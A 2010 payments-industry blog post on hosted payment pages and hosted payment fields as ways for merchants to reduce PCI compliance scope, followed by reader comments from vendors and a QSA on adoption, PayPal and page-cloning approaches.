Hosted Payment Pages and Fields

by Allen Weinberg on March 31, 2010

in Allen Weinberg, ECommerce, Ecommerce Payments, Hosted Payments

Allen Weinberg - Glenbrook Partners

As a volunteer at several non-profits, I have, of course, jumped or gotten pulled into those organizations’ payment issues. Accepting donations over the Internet is increasingly important and there are a staggering array of specialized service providers that offer turnkey payment acceptance.

Over the past year though, we at Glenbrook have noticed more and more traditional ecommerce merchants choosing to reduce the scope of their PCI compliance efforts via utilizing “hosted payments pages” and its close cousin, hosted payments fields. And we’re not talking about just mom and pop businesses – we’re hearing about merchants doing hundreds of millions in dollar volume (even in the billion dollar range) seriously investigating this approach.

If you’re not familiar with hosted payment pages (HPP) and order fields, it’s essentially the notion of redirecting a customer to a separate, secure website/page to enter their confidential/sensitive payment data. That page, or pages, have the same look and feel of the merchants’ own website, but are hosted by a trusted third party such that the merchant never touches the payment data.

Hosted order fields are an interesting variant whereby the payments page is still hosted by the merchant, but the actual field where the consumer enters their payment data is served up by a third party. Often that allows more control and flexibility for the merchant.

As one might imagine, both are natural adjunct services to tokenization for card-not-present merchants – since they close the “data in-flight” air gap inherent in many standard tokenization solutions (e.g., the auth request with full PAN and other data originates from the merchant server, and the tokenized value for storage/future use is returned with the auth response).

One of the things we’ve been noticing is that some of the more innovative HPP providers have been taking some of the traditional friction out of the process for merchants – specifically the often complicated/time consuming process of updating the payments pages hosted on someone else’s systems.

A few companies that have hit our radar screen, such as CRE Secure, Commerce Lab from IP Commerce, CyberSource, and Pay.On in Europe and Asia, have focused on minimizing the friction that used to be inherent when the merchant made changes to its payments pages. Said another way, the hosted pages stay up to date as the merchant’s site design may change in the future.

If you are aware of other companies offering similar capabilities, I’d greatly appreciate it if you could bring them to my attention ( – we at Glenbrook love to stay up to date on all the great offerings out there! Also, if you have a feel for how widespread the adoption of HPP and hosted order fields is in the US and beyond, please let me know!

9 Responses to “Hosted Payment Pages and Fields”

  1. pwb says:

    Paypal totally dropped the ball on this. It could have completely dominated hosted credit card payments and has continued to remain on the sidelines forcing buyers through it’s convoluted checkout flows.

    • Allen Weinberg says:

      pwb – thanks for your interesting comment. While it is true that PayPal users are somewhat redirected, some might argue that the checkout process is still more streamlined than standard bankcard use cases: 16 digit account number, 4 digit expiration date, 3 digit CVN, billing address, shipping address, etc, versus email address/PayPal user ID and password. And from a PCI standpoint merchants accepting a PayPal txns aren’t touching PANs and such (I didn’t mean to make this sound like a PayPal commercial — just thinking about the notion of checkout flows, users, PCI, etc.)

      Interestingly, take a look at a CRE Secure press release from 3/2/2010 re: CRE Secure being the preferred provider of HPP for merchants using PayPal Website Payments Pro and PayPal PayFlow Pro payment gateways (—march-2-2010.html)


  2. Ash says:

    I’m curious about the PCI compliance of Hosted Payment Fields, while the merchant isn’t touching the card data, card data is still entered on a page that is controlled and managed by the merchant (so an attack could simply modify the page content to get access to cards as they are entered and sent to the gateway)

    So while their PCI compliance requirements are reduced, I would think that their still should be a significant requirement to secure the system serving the page, when compared to a hosted payment page where the entry is completely controlled on a 3rd party system?

    • Greg McGraw says:

      Ash–you bring up an interesting question. The hosted payment service from CRE Secure, mentioned in Allen’s post, actually pulls a blank, styled page from the merchant’s site over SSL, strips it of any Java script, ActiveX or iframes executable code, marries it up with a secure payment form and displays it directly back to the end user’s browser. Thus, giving the appearance that is is coming from the merchant’s site while actually being totally ‘cloned’ and presented from a Level 1 PCI DSS data center. Result: Merchant gets to maintain ultimate ‘control’ over the content displayed to end users but never touches a credit card on their inherently insecure hosting environment. It might be worth a look. Like to get your comments, too.

      • Ash says:

        Greg, your approach at CRE is (from my perspective/research) the right way to do it, allow the merchant total control to brand/modify the page, serve them up off a secure sever, and also allow the merchant to manage the branding themselves.

        We considered rolling out a payment fields approach, but there were so many unknowns, and in the end out QSA said we would maintain PCI compliance, but if there was ever a breach in the fields method, then there would be a lot of uncertainty around its future. In the end we went with something very similar to the CRE approach of hosted pages.

        However, all up there has been a massive shift in large organisations looking for hosted solutions. A few years ago it would have almost been unheard of for a enterprise to use a hosted solution, but now almost every tender I work with is requiring a hosted solution to reduce the PCI compliance requirements.

  3. Walt Conway says:

    Hosted order pages and other, related forms of outsourcing is becoming more common in even larger merchants. The advantages of taking much of the PCI burden and the convenience are primary draws. Companies need to ask themselves what business they are in. My guess is that not too many will say they are in the payment processing business. Therefore it makes sense not to devote resources to hosting and maintaining your own web payment page(s).

    As a QSA, whenever I speak of PCI, I emphasize that we need to keep in mind it has two implications for businesses. The first is that your costs have gone up: they may go up a little or a lot, but you have additional work to do. The second is that you will change the way you process payments: this is where limiting your scope and outsourcing come into play. I see more and more companies seriously considering planned, thoughtful outsourcing as a sensible way to approach PCI compliance.

  4. Allen Weinberg says:

    Many thanks for all the comments and out-of-band emails! One more thing – does anyone have any sense of how prevalent hosted payment fields are vs. hosted payment pages? Seems that hosted fields could involve less friction than hosted pages, but I just don’t have a sense of whether that’s true in practice. I know that CyberSource and Braintree provide hosted fields in the US but aren’t aware of any others….

  5. James says:

    3rd party HPP solution I think adds an additional point of failure and and additional exposure of card data unnecessarily. Please take a look at a method I’m proposing here:

    Using this method, only the payment service provider receives raw card data, and the resulting encryption can be safely passed to the merchant.

    Additionally, it will add confidence for shoppers in the transaction as the process is not hidden from them. Also this method provides an opportunity for shoppers to have more control on the authorization granted to the merchant in allowing them to set an expiration (not the expiration of the card, but expiration on the encrypted CHD.)

  6. Rich Brower says:

    Hello Allen & All!

    I am seeing a lot of interest and activity from merchants in our hosted solutions. We offer two methods: Hosting the entire checkout process or hosting only the required fields for the transaction requested. The latter method enables the merchant almost full control over the consumer experience and is the method I typically recommend.

    Merchants typically report two drivers for their adoption of a hosted solution. The first is their desire to reduce burden of Level 1-3 PCI compliance as you point out above. The second reason for adopting a hosted solution is that it can enable the merchant to build a quick checkout solution. This is especially interesting to merchants that need to build new interfaces in order to accept some of the “alternative” payments which would require different data inputs. A hosted solution can provide an efficient and standardized flow for a merchant’s IT department.

Leave a Reply

Previous post:

Next post:

Clicky Web Analytics